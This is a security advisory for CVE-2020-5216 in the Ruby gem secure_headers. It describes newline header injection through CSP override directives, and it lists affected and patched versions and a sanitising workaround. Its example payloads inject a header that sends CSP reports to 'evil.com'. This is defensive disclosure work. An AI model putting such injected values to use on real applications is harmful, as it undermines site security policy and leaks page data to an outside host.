logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2020-5216 secure_headers

Package

Manager: gem
Name: secure_headers
Vulnerable Version: >=6.0.0 <6.3.0 || >=5.0.0 <5.2.0 || >=0 <3.9.0

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

EPSS: 0.00347 pctl0.56551

Details

Limited header injection when using dynamic overrides with user input in RubyGems secure_headers ### Impact If user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection. Upon seeing a newline in the header, rails will silently create a new `Content-Security-Policy` header with the remaining value of the original string. It will continue to create new headers for each newline. e.g. ```ruby override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])` ``` would result in ``` Content-Security-Policy: ... script-src: mycdn.com Content-Security-Policy: injected Content-Security-Policy: rest-of-the-header ``` CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial: ```ruby override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"]) ``` ``` Content-Security-Policy: ... script-src: mycdn.com Content-Security-Policy: default-src 'none'; report-uri evil.com Content-Security-Policy: rest-of-the-header ``` ### Patches This has been fixed in 6.3.0, 5.2.0, and 3.9.0 ### Workarounds ```ruby override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")]) ``` ### References https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c [The effect of multiple policies](https://www.w3.org/TR/CSP3/#multiple-policies) ### For more information If you have any questions or comments about this advisory: * Open an issue in [this repo](https://github.com/twitter/secure_headers/security/advisories/new) * DM us at @ndm on twitter

Metadata

Created: 2020-01-23T02:27:53Z
Modified: 2023-05-16T16:11:19Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/01/GHSA-w978-rmpf-qmwg/GHSA-w978-rmpf-qmwg.json
CWE IDs: ["CWE-113"]
Alternative ID: GHSA-w978-rmpf-qmwg
Finding: F184
Auto approve: 1